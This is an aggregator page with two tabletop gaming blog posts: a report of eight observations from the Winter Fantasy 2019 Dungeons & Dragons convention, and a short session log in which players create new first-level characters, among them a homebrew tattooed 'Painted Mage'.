At the convention center in Fort Wayne, Indiana, the entire Winter Fantasy convention fits into one hall. Despite the event’s compact size, it delivers as much Dungeons & Dragons as the biggest table-top gaming cons. Imagine the D&D track from Origins or Gen Con, complete with the Adventurers League brain trust, and the game’s most passionate players, concentrated in a convention of its own. Plus, the con offers plenty of inexpensive hotel rooms. Sure, Fort Wayne suffers an icy February, but you come to game.

This year’s convention inspired 8 thoughts about D&D.

1. Winter Fantasy 2019 marks my first convention under the Season 8 Adventurers League rules, which meant lots of jokes about the system’s abstractions. Based on descriptions at my tables, treasure chests now contain vouchers allowing the purchase of magic items, coins disappear into trusts payable upon leveling, and hardened mercenaries now tackle deadly missions for the promise of gratitude. (These adventurers took Intelligence as a dump stat and think “gratitude” is a gemstone.) For a summary of the season 8 league rules, see My Dungeons & Dragons Adventurers League Quick Reference Sheet.

Despite all the jokes, players seemed fine with the practice of unlocking magic items. Other aspects deserve changes. I plan a deeper look in a future post.

2. The convention’s organizer, Baldman Games, creates Adventurers League scenarios set in the Moonshae islands. With Shawn Merwin and Eric Menge shepherding the writing, these adventures boast an otherworldly flavor of Celtic myth and faerie. In Moonshae, the good fey are dangerous, the bad fey are creepy and dangerous, and the story ends when the witch eats the children. Those brats had it coming.

Everyone but the dog

3. My first game gathered James Introcaso, Mike Shea, Teos Abadia, and other D&D enthusiasts to play MOON4-1 Precious Cargo by Cindy Moore. Through our adventures, we befriended goblins, a svirfneblin, and a dog, adding all to our party. Credit our dungeon master, Garrett Crowe, for silly goblin voices and a knack for playing along. Just when Garrett seemed like a pushover, the svirfneblin betrayed us. Good move.

Whenever I run a D&D game for kids, their party seems to gather an entourage of pets, companions, and friends. The kids love it. So what does it say when a party of “mature,” “sophisticated” D&D players gathers a similar zoo? Don’t answer that question. And if my editor puts quotes around any words, ignore them.

4. Speaking of strategic mastery, our party started befriending monsters because Cindy penned a challenging adventure that made combat seem risky. I love difficult adventures because they can either bring tense battles that push characters to their limits or—in our case—alliances with one-armed goblins who fancy themselves emperor. Because Cindy’s adventures once carried a reputation for being cupcakes, this scenario’s difficulty surprised me. Later in the con, I asked her if this reputation led to a change in style. “Yes, I said eff you all.” Well played, Cindy.

5. As for challenges, a highlight of my games came when a kraken tentacle hurled my unconscious character to another game table. The incident came during the D&D multi-table special adventure MOON ES-1 A Drop in the Ocean. The DMs invented a process where tentacle attacks could fling characters from table to table. Falling characters landed in the quipper-infested waters controlled by another DM. Players loved it.

Many multi-table adventures feature a way for characters to jump between tables, but they typically move in response to a call for help. Players never ask for help, so nobody moves. The tentacle rule sparked concerns that too many people might temporarily land at a single table, leading to a party size that exceeded league regulations.

Luckily, someone read the part of league guidelines that grants DMs authority to make rulings that make things fun. Dave and Gary did not give D&D to us just to see a game where kraken tentacles can’t hurl unconscious characters from table to table.

6. Another highlight came when I played Invasion from the Planet of Tarrasques run by the adventure’s author, James Introcaso. This stands as my first game with top-level characters. Despite our superhero-like power, James pressed us to our limits and we had a blast. This adventure serves “over-the-top, gonzo action” without becoming silly. I’ve already committed to running it for friends.

7. The play of the convention came during the adventure MOON6-2 Troubled Visions, run by Eric Menge. The adventure pits the party against a fey prince named Uznezzir, who revels in everything repulsive and unclean. Our party found the prince’s captive and unrequited love, an Eladrin woman named Aodh. Uznezzir offered her freedom as the stake in a challenge. He suggested a riddle contest. D&D players know how that goes: The players try to solve a riddle and the adventure moves on a well-trod path.

Instead, a party member played by Jason Pearson challenged Uznezzir to a compliment contest. Is that even a thing? Whoever lavished Aodh with the best compliment would win her freedom or her eternal imprisonment. She swore on her honor to judge fairly. While the party struggled to craft praise, Eric as Uznezzir found quick inspiration.

At last the party finished and we read our work. “Aodh, Your hair shines like the sun yadda yadda yadda.” Surely Uznezzir’s honeyed words would best our platitudes.

Then the fey prince spoke. “Aodh, You are as beautiful as a heap of rotting fresh turned green under a yellow sky of dripping acid that reeks to the highest heaven and brings all the flies.”

We won the contest. In the tradition of fables, Jason had realized the fey prince’s weakness and used it to outsmart him, while Eric had been quick enough to see the twist in the story and play it out. This may rank as the best moment of collaborative storytelling I’ve seen in a D&D game.

8. The authors of D&D’s creature statistics missed an opportunity when they failed to give owls an 18 Wisdom.

Categories: Tabletop Gaming Blogs

HackMoor 2019/02/07 Campaign Reset New Character Development

Furiously Eclectic People - Tue, 02/12/2019 - 02:29

Games are on Thursday nights sometime after 6:30PM at World's Best Comics, 9714 Warwick Blvd Newport News, Virginia 23601.

We had a large sausage pizza.

++++ START OF SESSION ++++

In continuation from last week we continued developing new first level characters, the end results are thus, one each:

Wood-Elf Druid
Half-Elf Thief
Cleric - Roman Catholic
Painted Mage
Samurai

The Painted Mage is an interesting choice. Instead of a plethora of spell books to memorize, all that is needed is sufficient skin space to put spell tattoos at the rate of one level of spell per pound of flesh. Unfortunately as the Painted Mage gains more levels, he has a tendency to become more corpulent and the chance of spell fumble increases. As the Mage may need to look under folds of skin to find a particular tattoo. This shows a certain affinity with some gamers.

I see potential party conflicts already brewing as everyone but the Cleric has chosen other gawds. The Painted Mage follows a Central American gawd. I fully expect the Cleric attempting to force the Painted Mage to start building a Mission out of adobe. The Church is rather intransigent after all. Notwithstanding the Druid and the yearly burning-man ritual.

It may be a good harvest this year.

++++ OUT OF CHEESE ERROR ++++

BT

BBBB

PART 2.

++++ CHARACTER ROSTER ++++

CHARACTERS
See text.

BT

BBBB

++++ RECORD KEEPING ++++

PART 3.

This is also posted on three forums, and a blog.



--

Tracy Johnson
Old fashioned text games hosted below:

BT

NNNN

tweetbutton: 
Categories: Miscellaneous Blogs

Pages

Subscribe to Furiously Eclectic People aggregator